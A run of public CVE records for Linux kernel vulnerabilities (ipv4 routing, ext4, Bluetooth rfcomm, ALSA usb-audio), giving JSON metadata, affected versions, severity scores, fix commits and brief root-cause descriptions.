          "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nipv4: check for NULL idev in ip_route_use_hint()\n\nsyzbot was able to trigger a NULL deref in fib_validate_source()\nin an old tree [1].\n\nIt appears the bug exists in latest trees.\n\nAll calls to __in_dev_get_rcu() must be checked for a NULL result.\n\n[1]\ngeneral protection fault, probably for non-canonical address 0xdffffc0000000000: 0000 [#1] SMP KASAN\nKASAN: null-ptr-deref in range [0x0000000000000000-0x0000000000000007]\nCPU: 2 PID: 3257 Comm: syz-executor.3 Not tainted 5.10.0-syzkaller #0\nHardware name: QEMU Standard PC (Q35 + ICH9, 2009), BIOS 1.16.3-debian-1.16.3-2~bpo12+1 04/01/2014\n RIP: 0010:fib_validate_source+0xbf/0x15a0 net/ipv4/fib_frontend.c:425\nCode: 18 f2 f2 f2 f2 42 c7 44 20 23 f3 f3 f3 f3 48 89 44 24 78 42 c6 44 20 27 f3 e8 5d 88 48 fc 4c 89 e8 48 c1 e8 03 48 89 44 24 18 \u003c42\u003e 80 3c 20 00 74 08 4c 89 ef e8 d2 15 98 fc 48 89 5c 24 10 41 bf\nRSP: 0018:ffffc900015fee40 EFLAGS: 00010246\nRAX: 0000000000000000 RBX: ffff88800f7a4000 RCX: ffff88800f4f90c0\nRDX: 0000000000000000 RSI: 0000000004001eac RDI: ffff8880160c64c0\nRBP: ffffc900015ff060 R08: 0000000000000000 R09: ffff88800f7a4000\nR10: 0000000000000002 R11: ffff88800f4f90c0 R12: dffffc0000000000\nR13: 0000000000000000 R14: 0000000000000000 R15: ffff88800f7a4000\nFS:  00007f938acfe6c0(0000) GS:ffff888058c00000(0000) knlGS:0000000000000000\nCS:  0010 DS: 0000 ES: 0000 CR0: 0000000080050033\nCR2: 00007f938acddd58 CR3: 000000001248e000 CR4: 0000000000352ef0\nDR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000\nDR3: 0000000000000000 DR6: 00000000fffe0ff0 DR7: 0000000000000400\nCall Trace:\n  ip_route_use_hint+0x410/0x9b0 net/ipv4/route.c:2231\n  ip_rcv_finish_core+0x2c4/0x1a30 net/ipv4/ip_input.c:327\n  ip_list_rcv_finish net/ipv4/ip_input.c:612 [inline]\n  ip_sublist_rcv+0x3ed/0xe50 net/ipv4/ip_input.c:638\n  ip_list_rcv+0x422/0x470 net/ipv4/ip_input.c:673\n  __netif_receive_skb_list_ptype net/core/dev.c:5572 [inline]\n  __netif_receive_skb_list_core+0x6b1/0x890 net/core/dev.c:5620\n  __netif_receive_skb_list net/core/dev.c:5672 [inline]\n  netif_receive_skb_list_internal+0x9f9/0xdc0 net/core/dev.c:5764\n  netif_receive_skb_list+0x55/0x3e0 net/core/dev.c:5816\n  xdp_recv_frames net/bpf/test_run.c:257 [inline]\n  xdp_test_run_batch net/bpf/test_run.c:335 [inline]\n  bpf_test_run_xdp_live+0x1818/0x1d00 net/bpf/test_run.c:363\n  bpf_prog_test_run_xdp+0x81f/0x1170 net/bpf/test_run.c:1376\n  bpf_prog_test_run+0x349/0x3c0 kernel/bpf/syscall.c:3736\n  __sys_bpf+0x45c/0x710 kernel/bpf/syscall.c:5115\n  __do_sys_bpf kernel/bpf/syscall.c:5201 [inline]\n  __se_sys_bpf kernel/bpf/syscall.c:5199 [inline]\n  __x64_sys_bpf+0x7c/0x90 kernel/bpf/syscall.c:5199"
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2025-05-04T09:10:24.352Z",
        "orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
        "shortName": "Linux"
      },
      "references": [
        {
          "url": "https://git.kernel.org/stable/c/7da0f91681c4902bc5c210356fdd963b04d5d1d4"
        },
        {
          "url": "https://git.kernel.org/stable/c/03b5a9b2b526862b21bcc31976e393a6e63785d1"
        },
        {
          "url": "https://git.kernel.org/stable/c/7a25bfd12733a8f38f8ca47c581f876c3d481ac0"
        },
        {
          "url": "https://git.kernel.org/stable/c/8240c7308c941db4d9a0a91b54eca843c616a655"
        },
        {
          "url": "https://git.kernel.org/stable/c/c71ea3534ec0936fc57e6fb271c7cc6a2f68c295"
        },
        {
          "url": "https://git.kernel.org/stable/c/58a4c9b1e5a3e53c9148e80b90e1e43897ce77d1"
        }
      ],
      "title": "ipv4: check for NULL idev in ip_route_use_hint()",
      "x_generator": {
        "engine": "bippy-1.2.0"
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
    "assignerShortName": "Linux",
    "cveId": "CVE-2024-36008",
    "datePublished": "2024-05-20T09:48:07.596Z",
    "dateReserved": "2024-05-17T13:50:33.152Z",
    "dateUpdated": "2025-05-04T09:10:24.352Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

CVE-2024-26774 (GCVE-0-2024-26774)

Vulnerability from cvelistv5 – Published: 2024-04-03 17:01 – Updated: 2025-06-19 12:39

Title

ext4: avoid dividing by 0 in mb_update_avg_fragment_size() when block bitmap corrupt

Summary

In the Linux kernel, the following vulnerability has been resolved: ext4: avoid dividing by 0 in mb_update_avg_fragment_size() when block bitmap corrupt Determine if bb_fragments is 0 instead of determining bb_free to eliminate the risk of dividing by zero when the block bitmap is corrupted.

Severity ?

No CVSS data available.

Assigner

Linux

References

URL

Tags

	https://git.kernel.org/stable/c/8b40eb2e716b503f7…
	https://git.kernel.org/stable/c/f32d2a745b0212325…
	https://git.kernel.org/stable/c/8cf9cc602cfb40085…
	https://git.kernel.org/stable/c/993bf0f4c393b3667…

Impacted products

Vendor

Product

Version

Linux

Affected: 83e80a6e3543f37f74c8e48a5f305b054b65ce2a , < 8b40eb2e716b503f7a4e1090815a17b1341b2150 (git)
Affected: 83e80a6e3543f37f74c8e48a5f305b054b65ce2a , < f32d2a745b02123258026e105a008f474f896d6a (git)
Affected: 83e80a6e3543f37f74c8e48a5f305b054b65ce2a , < 8cf9cc602cfb40085967c0d140e32691c8b71cf3 (git)
Affected: 83e80a6e3543f37f74c8e48a5f305b054b65ce2a , < 993bf0f4c393b3667830918f9247438a8f6fdb5b (git)
Affected: 398a0fdb38d9ab5e68023667cc5e6e3d109e2d6b (git)

Linux

Affected: 6.0
Unaffected: 0 , < 6.0 (semver)
Unaffected: 6.1.80 , ≤ 6.1.* (semver)
Unaffected: 6.6.19 , ≤ 6.6.* (semver)
Unaffected: 6.7.7 , ≤ 6.7.* (semver)
Unaffected: 6.8 , ≤ * (original_commit_for_fix)

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-02T00:14:13.371Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/687061cfaa2ac3095170e136dd9c29a4974f41d4"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/8b40eb2e716b503f7a4e1090815a17b1341b2150"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/f32d2a745b02123258026e105a008f474f896d6a"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/8cf9cc602cfb40085967c0d140e32691c8b71cf3"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/993bf0f4c393b3667830918f9247438a8f6fdb5b"
          }
        ],
        "title": "CVE Program Container"
      },
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2024-26774",
                "options": [
                  {
                    "Exploitation": "none"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2024-09-10T15:51:21.311447Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2024-09-11T17:33:10.554Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      }
    ],
    "cna": {
      "affected": [
        {
          "defaultStatus": "unaffected",
          "product": "Linux",
          "programFiles": [
            "fs/ext4/mballoc.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "lessThan": "8b40eb2e716b503f7a4e1090815a17b1341b2150",
              "status": "affected",
              "version": "83e80a6e3543f37f74c8e48a5f305b054b65ce2a",
              "versionType": "git"
            },
            {
              "lessThan": "f32d2a745b02123258026e105a008f474f896d6a",
              "status": "affected",
              "version": "83e80a6e3543f37f74c8e48a5f305b054b65ce2a",
              "versionType": "git"
            },
            {
              "lessThan": "8cf9cc602cfb40085967c0d140e32691c8b71cf3",
              "status": "affected",
              "version": "83e80a6e3543f37f74c8e48a5f305b054b65ce2a",
              "versionType": "git"
            },
            {
              "lessThan": "993bf0f4c393b3667830918f9247438a8f6fdb5b",
              "status": "affected",
              "version": "83e80a6e3543f37f74c8e48a5f305b054b65ce2a",
              "versionType": "git"
            },
            {
              "status": "affected",
              "version": "398a0fdb38d9ab5e68023667cc5e6e3d109e2d6b",
              "versionType": "git"
            }
          ]
        },
        {
          "defaultStatus": "affected",
          "product": "Linux",
          "programFiles": [
            "fs/ext4/mballoc.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "status": "affected",
              "version": "6.0"
            },
            {
              "lessThan": "6.0",
              "status": "unaffected",
              "version": "0",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.1.*",
              "status": "unaffected",
              "version": "6.1.80",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.6.*",
              "status": "unaffected",
              "version": "6.6.19",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.7.*",
              "status": "unaffected",
              "version": "6.7.7",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "*",
              "status": "unaffected",
              "version": "6.8",
              "versionType": "original_commit_for_fix"
            }
          ]
        }
      ],
      "cpeApplicability": [
        {
          "nodes": [
            {
              "cpeMatch": [
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.1.80",
                  "versionStartIncluding": "6.0",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.6.19",
                  "versionStartIncluding": "6.0",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.7.7",
                  "versionStartIncluding": "6.0",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.8",
                  "versionStartIncluding": "6.0",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionStartIncluding": "5.19.12",
                  "vulnerable": true
                }
              ],
              "negate": false,
              "operator": "OR"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "In the Linux kernel, the following vulnerability has been resolved:\n\next4: avoid dividing by 0 in mb_update_avg_fragment_size() when block bitmap corrupt\n\nDetermine if bb_fragments is 0 instead of determining bb_free to eliminate\nthe risk of dividing by zero when the block bitmap is corrupted."
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2025-06-19T12:39:15.315Z",
        "orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
        "shortName": "Linux"
      },
      "references": [
        {
          "url": "https://git.kernel.org/stable/c/8b40eb2e716b503f7a4e1090815a17b1341b2150"
        },
        {
          "url": "https://git.kernel.org/stable/c/f32d2a745b02123258026e105a008f474f896d6a"
        },
        {
          "url": "https://git.kernel.org/stable/c/8cf9cc602cfb40085967c0d140e32691c8b71cf3"
        },
        {
          "url": "https://git.kernel.org/stable/c/993bf0f4c393b3667830918f9247438a8f6fdb5b"
        }
      ],
      "title": "ext4: avoid dividing by 0 in mb_update_avg_fragment_size() when block bitmap corrupt",
      "x_generator": {
        "engine": "bippy-1.2.0"
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
    "assignerShortName": "Linux",
    "cveId": "CVE-2024-26774",
    "datePublished": "2024-04-03T17:01:00.618Z",
    "dateReserved": "2024-02-19T14:20:24.176Z",
    "dateUpdated": "2025-06-19T12:39:15.315Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

CVE-2024-26903 (GCVE-0-2024-26903)

Vulnerability from cvelistv5 – Published: 2024-04-17 10:27 – Updated: 2026-01-05 10:34

Title

Bluetooth: rfcomm: Fix null-ptr-deref in rfcomm_check_security

Summary

In the Linux kernel, the following vulnerability has been resolved: Bluetooth: rfcomm: Fix null-ptr-deref in rfcomm_check_security During our fuzz testing of the connection and disconnection process at the RFCOMM layer, we discovered this bug. By comparing the packets from a normal connection and disconnection process with the testcase that triggered a KASAN report. We analyzed the cause of this bug as follows: 1. In the packets captured during a normal connection, the host sends a `Read Encryption Key Size` type of `HCI_CMD` packet (Command Opcode: 0x1408) to the controller to inquire the length of encryption key.After receiving this packet, the controller immediately replies with a Command Completepacket (Event Code: 0x0e) to return the Encryption Key Size. 2. In our fuzz test case, the timing of the controller's response to this packet was delayed to an unexpected point: after the RFCOMM and L2CAP layers had disconnected but before the HCI layer had disconnected. 3. After receiving the Encryption Key Size Response at the time described in point 2, the host still called the rfcomm_check_security function. However, by this time `struct l2cap_conn *conn = l2cap_pi(sk)->chan->conn;` had already been released, and when the function executed `return hci_conn_security(conn->hcon, d->sec_level, auth_type, d->out);`, specifically when accessing `conn->hcon`, a null-ptr-deref error occurred. To fix this bug, check if `sk->sk_state` is BT_CLOSED before calling rfcomm_recv_frame in rfcomm_process_rx.

Severity ?

5.5 (Medium)


                        
                          CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H

CWE

CWE-476 - NULL Pointer Dereference

Assigner

Linux

References

URL

Tags

	https://git.kernel.org/stable/c/369f419c097e82407…
	https://git.kernel.org/stable/c/5f369efd9d963c1f7…
	https://git.kernel.org/stable/c/81d7d920a22fd58ef…
	https://git.kernel.org/stable/c/8d1753973f598531b…
	https://git.kernel.org/stable/c/567c0411dc3b424fc…
	https://git.kernel.org/stable/c/3ead59bafad05f296…
	https://git.kernel.org/stable/c/5f9fe302dd3a9bbc5…
	https://git.kernel.org/stable/c/2535b848fa0f42ddf…

Impacted products

Vendor

Product

Version

Linux

Affected: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 , < 369f419c097e82407dd429a202cde9a73d3ae29b (git)
Affected: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 , < 5f369efd9d963c1f711a06c9b8baf9f5ce616d85 (git)
Affected: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 , < 81d7d920a22fd58ef9aedb1bd0a68ee32bd23e96 (git)
Affected: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 , < 8d1753973f598531baaa2c1033cf7f7b5bb004b0 (git)
Affected: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 , < 567c0411dc3b424fc7bd1e6109726d7ba32d4f73 (git)
Affected: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 , < 3ead59bafad05f2967ae2438c0528d53244cfde5 (git)
Affected: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 , < 5f9fe302dd3a9bbc50f4888464c1773f45166bfd (git)
Affected: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 , < 2535b848fa0f42ddff3e5255cf5e742c9b77bb26 (git)

Linux

Affected: 2.6.12
Unaffected: 0 , < 2.6.12 (semver)
Unaffected: 4.19.311 , ≤ 4.19.* (semver)
Unaffected: 5.4.273 , ≤ 5.4.* (semver)
Unaffected: 5.10.214 , ≤ 5.10.* (semver)
Unaffected: 5.15.153 , ≤ 5.15.* (semver)
Unaffected: 6.1.83 , ≤ 6.1.* (semver)
Unaffected: 6.6.23 , ≤ 6.6.* (semver)
Unaffected: 6.7.11 , ≤ 6.7.* (semver)
Unaffected: 6.8 , ≤ * (original_commit_for_fix)

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "metrics": [
          {
            "cvssV3_1": {
              "attackComplexity": "LOW",
              "attackVector": "LOCAL",
              "availabilityImpact": "HIGH",
              "baseScore": 5.5,
              "baseSeverity": "MEDIUM",
              "confidentialityImpact": "NONE",
              "integrityImpact": "NONE",
              "privilegesRequired": "LOW",
              "scope": "UNCHANGED",
              "userInteraction": "NONE",
              "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
              "version": "3.1"
            }
          },
          {
            "other": {
              "content": {
                "id": "CVE-2024-26903",
                "options": [
                  {
                    "Exploitation": "none"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2024-06-17T17:41:13.860273Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "problemTypes": [
          {
            "descriptions": [
              {
                "cweId": "CWE-476",
                "description": "CWE-476 NULL Pointer Dereference",
                "lang": "en",
                "type": "CWE"
              }
            ]
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2024-10-27T18:14:57.007Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      },
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-02T00:21:05.535Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/369f419c097e82407dd429a202cde9a73d3ae29b"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/5f369efd9d963c1f711a06c9b8baf9f5ce616d85"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/81d7d920a22fd58ef9aedb1bd0a68ee32bd23e96"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/8d1753973f598531baaa2c1033cf7f7b5bb004b0"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/567c0411dc3b424fc7bd1e6109726d7ba32d4f73"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/3ead59bafad05f2967ae2438c0528d53244cfde5"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/5f9fe302dd3a9bbc50f4888464c1773f45166bfd"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/2535b848fa0f42ddff3e5255cf5e742c9b77bb26"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00017.html"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00020.html"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "defaultStatus": "unaffected",
          "product": "Linux",
          "programFiles": [
            "net/bluetooth/rfcomm/core.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "lessThan": "369f419c097e82407dd429a202cde9a73d3ae29b",
              "status": "affected",
              "version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
              "versionType": "git"
            },
            {
              "lessThan": "5f369efd9d963c1f711a06c9b8baf9f5ce616d85",
              "status": "affected",
              "version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
              "versionType": "git"
            },
            {
              "lessThan": "81d7d920a22fd58ef9aedb1bd0a68ee32bd23e96",
              "status": "affected",
              "version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
              "versionType": "git"
            },
            {
              "lessThan": "8d1753973f598531baaa2c1033cf7f7b5bb004b0",
              "status": "affected",
              "version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
              "versionType": "git"
            },
            {
              "lessThan": "567c0411dc3b424fc7bd1e6109726d7ba32d4f73",
              "status": "affected",
              "version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
              "versionType": "git"
            },
            {
              "lessThan": "3ead59bafad05f2967ae2438c0528d53244cfde5",
              "status": "affected",
              "version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
              "versionType": "git"
            },
            {
              "lessThan": "5f9fe302dd3a9bbc50f4888464c1773f45166bfd",
              "status": "affected",
              "version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
              "versionType": "git"
            },
            {
              "lessThan": "2535b848fa0f42ddff3e5255cf5e742c9b77bb26",
              "status": "affected",
              "version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
              "versionType": "git"
            }
          ]
        },
        {
          "defaultStatus": "affected",
          "product": "Linux",
          "programFiles": [
            "net/bluetooth/rfcomm/core.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "status": "affected",
              "version": "2.6.12"
            },
            {
              "lessThan": "2.6.12",
              "status": "unaffected",
              "version": "0",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "4.19.*",
              "status": "unaffected",
              "version": "4.19.311",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.4.*",
              "status": "unaffected",
              "version": "5.4.273",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.10.*",
              "status": "unaffected",
              "version": "5.10.214",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.15.*",
              "status": "unaffected",
              "version": "5.15.153",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.1.*",
              "status": "unaffected",
              "version": "6.1.83",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.6.*",
              "status": "unaffected",
              "version": "6.6.23",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.7.*",
              "status": "unaffected",
              "version": "6.7.11",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "*",
              "status": "unaffected",
              "version": "6.8",
              "versionType": "original_commit_for_fix"
            }
          ]
        }
      ],
      "cpeApplicability": [
        {
          "nodes": [
            {
              "cpeMatch": [
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "4.19.311",
                  "versionStartIncluding": "2.6.12",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.4.273",
                  "versionStartIncluding": "2.6.12",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.10.214",
                  "versionStartIncluding": "2.6.12",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.15.153",
                  "versionStartIncluding": "2.6.12",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.1.83",
                  "versionStartIncluding": "2.6.12",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.6.23",
                  "versionStartIncluding": "2.6.12",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.7.11",
                  "versionStartIncluding": "2.6.12",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.8",
                  "versionStartIncluding": "2.6.12",
                  "vulnerable": true
                }
              ],
              "negate": false,
              "operator": "OR"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nBluetooth: rfcomm: Fix null-ptr-deref in rfcomm_check_security\n\nDuring our fuzz testing of the connection and disconnection process at the\nRFCOMM layer, we discovered this bug. By comparing the packets from a\nnormal connection and disconnection process with the testcase that\ntriggered a KASAN report. We analyzed the cause of this bug as follows:\n\n1. In the packets captured during a normal connection, the host sends a\n`Read Encryption Key Size` type of `HCI_CMD` packet\n(Command Opcode: 0x1408) to the controller to inquire the length of\nencryption key.After receiving this packet, the controller immediately\nreplies with a Command Completepacket (Event Code: 0x0e) to return the\nEncryption Key Size.\n\n2. In our fuzz test case, the timing of the controller\u0027s response to this\npacket was delayed to an unexpected point: after the RFCOMM and L2CAP\nlayers had disconnected but before the HCI layer had disconnected.\n\n3. After receiving the Encryption Key Size Response at the time described\nin point 2, the host still called the rfcomm_check_security function.\nHowever, by this time `struct l2cap_conn *conn = l2cap_pi(sk)-\u003echan-\u003econn;`\nhad already been released, and when the function executed\n`return hci_conn_security(conn-\u003ehcon, d-\u003esec_level, auth_type, d-\u003eout);`,\nspecifically when accessing `conn-\u003ehcon`, a null-ptr-deref error occurred.\n\nTo fix this bug, check if `sk-\u003esk_state` is BT_CLOSED before calling\nrfcomm_recv_frame in rfcomm_process_rx."
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2026-01-05T10:34:49.653Z",
        "orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
        "shortName": "Linux"
      },
      "references": [
        {
          "url": "https://git.kernel.org/stable/c/369f419c097e82407dd429a202cde9a73d3ae29b"
        },
        {
          "url": "https://git.kernel.org/stable/c/5f369efd9d963c1f711a06c9b8baf9f5ce616d85"
        },
        {
          "url": "https://git.kernel.org/stable/c/81d7d920a22fd58ef9aedb1bd0a68ee32bd23e96"
        },
        {
          "url": "https://git.kernel.org/stable/c/8d1753973f598531baaa2c1033cf7f7b5bb004b0"
        },
        {
          "url": "https://git.kernel.org/stable/c/567c0411dc3b424fc7bd1e6109726d7ba32d4f73"
        },
        {
          "url": "https://git.kernel.org/stable/c/3ead59bafad05f2967ae2438c0528d53244cfde5"
        },
        {
          "url": "https://git.kernel.org/stable/c/5f9fe302dd3a9bbc50f4888464c1773f45166bfd"
        },
        {
          "url": "https://git.kernel.org/stable/c/2535b848fa0f42ddff3e5255cf5e742c9b77bb26"
        }
      ],
      "title": "Bluetooth: rfcomm: Fix null-ptr-deref in rfcomm_check_security",
      "x_generator": {
        "engine": "bippy-1.2.0"
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
    "assignerShortName": "Linux",
    "cveId": "CVE-2024-26903",
    "datePublished": "2024-04-17T10:27:51.673Z",
    "dateReserved": "2024-02-19T14:20:24.187Z",
    "dateUpdated": "2026-01-05T10:34:49.653Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.2"
}

CVE-2024-27436 (GCVE-0-2024-27436)

Vulnerability from cvelistv5 – Published: 2024-05-17 12:12 – Updated: 2025-05-04 09:05

Title

ALSA: usb-audio: Stop parsing channels bits when all channels are found.

Summary

In the Linux kernel, the following vulnerability has been resolved: ALSA: usb-audio: Stop parsing channels bits when all channels are found. If a usb audio device sets more bits than the amount of channels it could write outside of the map array.

Severity ?

5.3 (Medium)


                        
                          CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L

CWE

CWE-787 - Out-of-bounds Write

Assigner

Linux

References

URL

Tags

	https://git.kernel.org/stable/c/7e2c1b0f6dd9abde9…
	https://git.kernel.org/stable/c/6d5dc96b154be371d…
	https://git.kernel.org/stable/c/5cd466673b34bac36…
	https://git.kernel.org/stable/c/9af1658ba293458ca…
	https://git.kernel.org/stable/c/629af0d5fe94a35f4…
	https://git.kernel.org/stable/c/22cad1b841a63635a…
	https://git.kernel.org/stable/c/c8a24fd281dcdf3c9…
	https://git.kernel.org/stable/c/6d88b289fb0a8d055…
	https://git.kernel.org/stable/c/a39d51ff1f52cd0b6…

Impacted products

Vendor

Product

Version

Linux

Affected: 04324ccc75f96b3ed7aad1c866d1b7925e977bdf , < 7e2c1b0f6dd9abde9e60f0f9730026714468770f (git)
Affected: 04324ccc75f96b3ed7aad1c866d1b7925e977bdf , < 6d5dc96b154be371df0d62ecb07efe400701ed8a (git)
Affected: 04324ccc75f96b3ed7aad1c866d1b7925e977bdf , < 5cd466673b34bac369334f66cbe14bb77b7d7827 (git)
Affected: 04324ccc75f96b3ed7aad1c866d1b7925e977bdf , < 9af1658ba293458ca6a13f70637b9654fa4be064 (git)
Affected: 04324ccc75f96b3ed7aad1c866d1b7925e977bdf , < 629af0d5fe94a35f498ba2c3f19bd78bfa591be6 (git)
Affected: 04324ccc75f96b3ed7aad1c866d1b7925e977bdf , < 22cad1b841a63635a38273b799b4791f202ade72 (git)
Affected: 04324ccc75f96b3ed7aad1c866d1b7925e977bdf , < c8a24fd281dcdf3c926413dafbafcf35cde517a9 (git)
Affected: 04324ccc75f96b3ed7aad1c866d1b7925e977bdf , < 6d88b289fb0a8d055cb79d1c46a56aba7809d96d (git)
